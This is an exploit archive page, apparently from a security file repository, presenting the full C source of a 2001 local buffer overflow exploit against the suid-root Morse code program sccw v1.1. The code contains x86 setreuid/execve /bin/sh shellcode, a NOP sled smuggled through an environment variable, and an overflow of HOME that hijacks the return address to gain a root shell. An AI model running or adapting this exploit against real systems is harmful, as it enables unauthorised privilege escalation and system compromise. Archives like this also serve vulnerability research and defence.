hhp-sccw_smash.c

hhp-sccw_smash.c: Posted Sep 11, 2001; Authored by hhp, Cody Tubbs | Site hhp-programming.net; A local buffer overflow exploit for sccw v1.1 and maybe others. Will gain root[uid=0].; tags | overflow, local, root; SHA-256 | d1d7ed798702a71cff032aca0dd11741f3f394e38171c2bbc7a8a1538a4d3b4d; Download | Favorite | View

hhp-sccw_smash.c

/*
 *  (sccw v1.1*) root[uid=0] local buffer overflow exploit.
 *
 * Author: Cody Tubbs (loophole of hhp).
 *   Site: http://www.hhp-programming.net/
 *  Email: pigspigs@yahoo.com
 *   Date: 6/4/2001. 2:51:34AM CST.
 *
 *   Info: sccw is a Morse code practice utility, much like pileup.
 *         Is installed +s(suid root) by default.
 *
 *   Tested on Slackware 7.1 2.4.5 x86.
 */

#include <stdio.h>

#define PATH   "/bin/sccw" // Change if needed.
#define OFFSET -6226       // Worked for me, brute if fails.
#define ALIGN  1           // Should not need to be change.
#define NOP    0x90        // x86 No OPeration.
#define DBUF   300         // 256+4(ebp)+4(eip)=264.
static char shellcode[]=   // 30 bytes setreuid(0,0) execve /bin/sh shellcode.
   "\x31\xdb"              // xor     ebx, ebx     // By bighawk[@warfare.com]
   "\x31\xc9"              // xor     ecx, ecx
   "\x99"                  // cdq
   "\xb0\x46"              // mov     al, 70
   "\xcd\x80"              // int     80h
   "\x53"                  // push    ebx
   "\x68\x6e\x2f\x73\x68"  // push    dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"  // push    dword 69622f2fh
   "\x89\xe3"              // mov     ebx, esp
   "\x52"                  // push    edx
   "\x53"                  // push    ebx
   "\x89\xe1"              // mov     ecx, esp
   "\xb0\x0b"              // mov     al, 11
   "\xcd\x80";             // int     80h

long get_sp(void){__asm__("movl %esp,%eax");}

void workit(char *heh){
 fprintf(stderr, "(sccw v1.1*) Local root[uid=0] exploit.\n");
 fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n");
 fprintf(stderr, "Usage: %s [offset] [align(0..3)]\n", heh);
}

main(int argc, char **argv){
 char eipeip[DBUF], buffer[4096], heh[DBUF+1];
 int i, offset, align;
 long address;
 workit(argv[0]);
 if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
 if(argc>2){align=atoi(argv[2]);}else{align=ALIGN;}
 address=get_sp()-offset;
 if(align>0){for(i=0;i<align;i++){eipeip[i]=0x69;}}//0x69.DOOT:D
 for(i=align;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
 for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){buffer[i]=NOP;}
 memcpy(eipeip,"HOME=",5);putenv(eipeip);
 memcpy(buffer+i,shellcode,strlen(shellcode));
 memcpy(buffer,"SCCWEX=",7);putenv(buffer);
 fprintf(stderr, "Ret-addr %#x, offset: %d, align: %d.\n",address,offset,align);
 execlp(PATH,"sccw",0);
}
[i

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

hhp-sccw_smash.c

hhp-sccw_smash.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

hhp-sccw_smash.c

Share This

hhp-sccw_smash.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems